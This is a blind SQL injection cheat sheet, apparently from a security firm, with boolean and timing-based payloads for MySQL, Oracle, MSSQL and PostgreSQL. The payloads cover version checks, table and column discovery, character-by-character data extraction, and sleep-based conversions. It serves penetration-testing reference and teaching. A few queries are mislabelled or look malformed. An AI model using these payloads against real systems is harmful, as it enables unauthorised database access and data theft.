Blind Injection
Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.
Partial-Blind
Partial-blind injections are queries that return HTTP Status Codes, or other markers in the HTML response, that indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).
| Description | Query |
|---|---|
| Version is 5.x.x | SELECT substring(version(),1,1)=5 |
| Subselect enabled | SELECT 1 AND (select 1)=1 |
| Table log_table exists | SELECT 1 AND (select 1 from log_table limit 0,1)=1 |
| Column message exists in table log_table Note: Query should error if column doesn't exist |
SELECT message FROM log_table LIMIT 0,1 |
| First letter of first message is t | SELECT ascii(substring((SELECT message from log_table limit 0,1),1,1))=114 |
Converting Partial-Blind queries to Full-Blind queries
Any of the above queries can be used in full-blind scenarios by using the following conversion: SELECT IF(*PARTIAL_BLIND_QUERY*, SLEEP(5), null)
Full-Blind
Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).
| Description | Query |
|---|---|
| User is root | SELECT IF(user() LIKE 'root@%', SLEEP(5), null) |
| User is root (Benchmark method) | SELECT * from (user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null) |
| Version is 5.x.x | SELECT * from (SUBSTRING(version(),1,1)=5,SLEEP(5),null) |
Blind Injection
Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.
Partial-Blind
Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).
| Description | Query |
|---|---|
| Version is 12.2 | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; |
| Subselect is enabled | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) |
| Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); |
| Column message exists in table log_table | Select COUNT(*) from user_tab_cols where column_name = 'MESSAGE' and table_name = 'LOG_TABLE'; |
| First letter of first message is t | Select message from log_table where rownum=1 and message LIKE 't%'; |
Converting Partial-Blind queries to Full-Blind queries
Any of the above queries can be used in full-blind scenarios by using the following conversion: SELECT CASE WHEN (*PARTIAL_BLIND_QUERY*)=1 THEN (SELECT count(*) FROM all_users a, all_users b, all_users c, all_users d) ELSE 0 END FROM dual
The partial-blind query must return one row, so always attempt to use COUNT on the column being selected. Add "all_users [letter]" ad naseum until the database response slows. You may need to cycle though [letter] if the database is caching responses.
Full-Blind
Full-blind queries do not indicate any result of the query in the HTTP/HTML response. This makes them dependent upon timing functions and other out-of-band methods for attacks. A true statement will take X seconds to respond, a false statement should return immediately.
| Description | Query |
|---|---|
| Version is 12.2 | SELECT CASE WHEN (SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%11.2%')=1 THEN (SELECT count(*) FROM all_users a, all_users b, all_users c, all_users d) ELSE 0 END FROM dual |
Blind Injection
Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.
Partial-Blind
Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).
| Description | Query |
|---|---|
| Version is 12.0.2000.8 | SELECT @@version WHERE @@version LIKE '%12.0.2000.8%' |
| Subselect is enabled | SELECT (SELECT @@version) |
| Table log_table exists | SELECT* FROM log_table |
| Column message exists in table log_table | SELECT message from log_table |
| First letter of first message is t | WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table) SELECT message FROM data WHERE row = 1 and message like 't%' |
Converting Partial-Blind queries to Full-Blind queries
Any of the above queries can be used in full-blind scenarios by using the following conversion: IF exists(*PARTIAL_BLIND_QUERY*) WAITFOR DELAY '00:00:02'
Full-Blind
Full-blind queries do not indicate any result of the query in the HTTP/HTML response. This makes them dependent upon timing functions and other out-of-band methods for attacks. A true statement will take X seconds to respond, a false statement should return immediately.
| Description | Query |
|---|---|
| Version is 12.0.2000.8 | IF exists(SELECT @@version where @@version like '%12.0.2000.8%') WAITFOR DELAY '00:00:02' |
Blind Injection
Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.
Partial-Blind
Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).
| Query |
|---|
| AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) |
| AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) |
© 2023 Copyright by NetSPI. All rights reserved.